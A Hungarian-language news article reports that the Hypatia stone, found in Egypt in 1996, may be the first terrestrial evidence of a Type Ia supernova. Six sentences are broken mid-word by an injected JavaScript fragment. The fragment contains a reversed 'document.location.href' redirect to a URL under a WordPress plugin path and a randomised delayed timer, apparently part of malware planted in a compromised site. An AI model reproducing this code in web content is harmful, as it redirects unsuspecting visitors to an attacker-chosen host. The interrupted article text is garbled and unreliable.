Az először 1996-ban Egyiptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomban felfedezett Hypatia kő kémiai összetétele egy ritka kozmikus esemény nyoma lehet, ugyanis olyan port és gázt tartalmaz, amely egykor egy hatalmas szupernóvatípus, egy haldokló csillag látványos robbanásakor jöttek létre.
A Szahara sivatagban feltárt különös földön kívüli űrszikla lehet az első bizonyíték a Földön egy ritka szupernóvatípusra.
Az először 1996-ban Egyiptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomban felfedezett Hypatia kő kémiai összetétele egy ritka kozmikus esemény nyoma lehet, ugyanis olyan port és gázt tartalmaz, amely egykor egy hatalmas szupernóvatípus, egy haldokló csillag látványos robbanásakor jöttek létre.
Az ilyen, Ia típusú szupernóvák általában olyan rendszerekben figyelhetők meg, amelyek egy összeomlott csillagmagból, egy úgynevezett fehér törpéből, illetve egy nagyobb, fiatalabb csillagból állnak – derül ki a Live Science cikkéből.
A kisebb és sűrűbb fehér törpe hatalmas gravitációs vonzását arra használja, hogy a lehető legtöbb anyagot ragadja el a fiatalabb csillagból. Ezt könyörtelenül felemészti, és a fiatalabb csillagot csepp alakúra nyújtja. A kozmikus kannibalizmus aktusa azonban végül kölcsönös pusztulással végződik, mivel a „vámpír” fehér törpe elég nagyra nő ahhoz, hogy a magjában újra fellángoljanak a nukleáris reakciók.
Egy hirtelen fényes villanás után egy hatalmas szupernóva-robbanás mindkét csillag besugárzott tartalmát kifelé löki.
A Hypatia-követ alkotó por és gáz „koktélja” valószínűleg évmilliárdok át sodródott a világűrben, amíg végül a Naprendszer születésekor az anyag össze nem állt egy nagyobb égitestté. Aztán a Naprendszer pereméről befelé indult el, eltalálta a Földet, a légkörbe belépve pedig darabokra esett szét.
A kutatók, hogy kiderítsék, honnan származik a kőzet, roncsolásmentes módszerekkel végezték el a Hypatia kőzet egy aprócska mintájának kémiai elemzését. Ebből kiderült, hogy a kőzetben szokatlanul alacsony a szilícium, a króm és a mangán – a Naprendszer belsejében ritka elemek –, ugyanakkor a kozmikus szomszédságunkban található objektumokhoz képest szokatlanul magas a vas, a kén, a foszfor, a réz és a vanádium mennyisége.
A toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}további tesztek még nagyobb meglepetést okoztak: úgy tűnik, hogy a kő még csak nem is galaxisunk azon karjából származik, ahol a Föld van.
A csillagadatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok átfogó elemzése és a modellezés után a csapat arra jutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott, hogy csak egy Ia típusú szupernóva adhat magyarázatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot a Hypatia eredetére. Jan Kramers, a Johannesburgi Egyetem munkatársa szerint amennyiben hipotézisük helyes, úgy a kő lehet az első kézzelfogható földi bizonyíték egy ilyen eseményre.
Érdemes hozzátenni, hogy a meteoritban az alumínium, a foszfor, a klór, a kálium, a réz és a cink szintje nincs összhangban azzal, amit egy Ia típusú szupernóvától elvárnának. Lehetséges, hogy ezeket az anyagokat a fehér törpe társától örökölte.
- Hirdetés -
